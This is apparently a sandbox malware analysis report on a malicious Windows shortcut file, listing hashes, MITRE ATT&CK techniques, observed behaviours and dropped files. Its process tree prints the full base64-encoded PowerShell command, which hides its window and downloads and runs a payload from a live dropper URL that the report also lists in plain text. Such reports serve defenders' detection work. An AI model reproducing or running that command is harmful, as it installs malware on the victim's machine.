1b847caaf38348409a73720a12b873672ee5cc1be743cb62fa9f4097b6ff69fc

General

Target

434128856ff38548fe68606a28ac1d1e_JaffaCakes118.lnk
Size

2KB
MD5

434128856ff38548fe68606a28ac1d1e
SHA1

f5c7212d1823a383e3f0872c199c75d958816538
SHA256

1b847caaf38348409a73720a12b873672ee5cc1be743cb62fa9f4097b6ff69fc
SHA512

71c8b0fd6917c5ae7cd33efd493b7d77c8fade356321b2909619cd1aee696d401a0403352184b5448d12a2d2a8a3a3ec1ace38434251988e21b8447312f9f6b2

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://sepogy.epiain.com/v2/gl.php?aHR0cHM6Ly9zZXBvZ3kuZXBpYWluLmNvbS92Mnx4b3Vn%

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1288	powershell.exe
1288	powershell.exe
1288	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1288	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 5076 wrote to memory of 1288	5076	cmd.exe	82
PID 5076 wrote to memory of 1288	5076	cmd.exe	82
PID 1288 wrote to memory of 5028	1288	powershell.exe	85
PID 1288 wrote to memory of 5028	1288	powershell.exe	85
PID 5028 wrote to memory of 1008	5028	csc.exe	87
PID 5028 wrote to memory of 1008	5028	csc.exe	87

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\434128856ff38548fe68606a28ac1d1e_JaffaCakes118.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5076
- C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en UABlADsAQQBkAEQALQBUAFkAUABlACAALQBuAGEATQBFACAAQQAgAC0AbQBFAG0AYgBFAFIAZABFAGYAaQBOAEkAVABpAE8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAG4AQQBtAEUAcwBQAEEAQwBlACAAYgA7AFsAQgAuAGEAXQA6ADoAcwBIAG8AdwBXAEkATgBEAG8AVwAoACgAWwBzAHkAUwB0AEUATQAuAGQAaQBBAGcATgBvAFMAdABpAGMAcwAuAFAAcgBvAEMARQBTAHMAXQA6ADoARwBFAHQAQwBVAHIAUgBlAE4AdABwAFIAbwBDAEUAcwBTACgAKQAgAHwAIABQAHMAKQAuAG0AYQBJAG4AVwBpAE4AZABPAHcASABhAE4ARABMAGUALAAwACkAOwBpAGUAWAAoAE4ARQB3AC0AbwBCAGoARQBDAFQAIABuAGUAdAAuAHcAZQBiAGMATABpAEUATgB0ACkALgBkAE8AVwBOAEwATwBhAGQAUwBUAFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwBzAGUAcABvAGcAeQAuAGUAcABpAGEAaQBuAC4AYwBvAG0ALwB2ADIALwBnAGwALgBwAGgAcAA/AGEASABSADAAYwBIAE0ANgBMAHkAOQB6AFoAWABCAHYAWgAzAGsAdQBaAFgAQgBwAFkAVwBsAHUATABtAE4AdgBiAFMAOQAyAE0AbgB4ADQAYgAzAFYAbgAlACcAKQA=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1288
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hobucxse\hobucxse.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5028
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D72.tmp" "c:\Users\Admin\AppData\Local\Temp\hobucxse\CSCDFDD016613742B1B9401DA24F9C4728.TMP"
      4⤵
      PID:1008

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES5D72.tmp

Filesize
1KB

MD5
da982e00dc41e8a10217201b0a0593b7

SHA1
8e1038438a7bd77370443b567d6ed5370f1e8069

SHA256
b8e994bcaeb639737c16a1082941d74c37e8fb93e46b030d30d96e6f3a0f592c

SHA512
74a305b4cef53a72becb3451705226fe532bdacaff5e8685b4fd6e490e5898a318153fe9977fe537f821add701ca4174968423f3e36103d406167c5496e12a0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u05xl1jz.psh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\hobucxse\hobucxse.dll

Filesize
3KB

MD5
789f4e62665a4cb579a3675c9c9acd32

SHA1
869461856d2d105723a3aba084e05d1bebd880c4

SHA256
1d5c47b4080fb67463a778b772760654eb7c44163fa071215617329deb0c82de

SHA512
80f0317e9f2702e58c75cb758b60460b2fdb9c1e7491e837f50138beca96451e82121a434e1ef8c079fee04ff0049ec68758d6c9675ef07d39317d3073581196

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hobucxse\CSCDFDD016613742B1B9401DA24F9C4728.TMP

Filesize
652B

MD5
77add126e3283638f7a699d9d9414fb1

SHA1
af4635ac008e3132d17a5cb7fdb8f8d1feefa896

SHA256
4099b28f38e6492bb25d012f4ad98f45fc522ad00b5b95f49ebb71c53c4a8515

SHA512
a11ee618b0ca363788ee2035532ed864e835e704f708e04da2117b5c28b99f8b4f550c8023b36d7effbffb8ab63dbc7d24e144e394ef12a55b4362dfb0b47db2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hobucxse\hobucxse.0.cs

Filesize
187B

MD5
dd6ab2ff4c462389df4293eb25b3f523

SHA1
ffc70f2025d1c802400f1ac8d8721c88547fb4b9

SHA256
6a1f4fbc312ee4b5105106efb192b8f80574a5f796848ae01d516f5752e1b635

SHA512
47e62a33654cc4daba627d89e76d87bed2af5421ed8f52164d5a5104797535520e6638dc69242599dce1a7a350f94e181dde509587162dbf01349bc11e20b055

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hobucxse\hobucxse.cmdline

Filesize
369B

MD5
585e478aa21a60b9e1733e9113908d9a

SHA1
e489fac9cb695f645714b36d32c4d948cde2c284

SHA256
a539f95c65811b7597929f30ff214778d34f4f85fdd1e0d2ce0b1d07ad234a99

SHA512
cf179e53949e14d44cccee2c5cfa46c1806ed301f8e81b9001923fe271805c9293088418128424e9ce725427f0af51662a6c46586ba126207c5aa2d8c4f7c8fd

Download Submit
memory/1288-13-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmp

Filesize
10.8MB

Download
memory/1288-16-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmp

Filesize
10.8MB

Download
memory/1288-15-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmp

Filesize
10.8MB

Download
memory/1288-14-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmp

Filesize
10.8MB

Download
memory/1288-2-0x00007FFEF8BF3000-0x00007FFEF8BF5000-memory.dmp

Filesize
8KB

Download
memory/1288-29-0x00000216AB6F0000-0x00000216AB6F8000-memory.dmp

Filesize
32KB

Download
memory/1288-12-0x00000216AC0C0000-0x00000216AC0E2000-memory.dmp

Filesize
136KB

Download
memory/1288-33-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing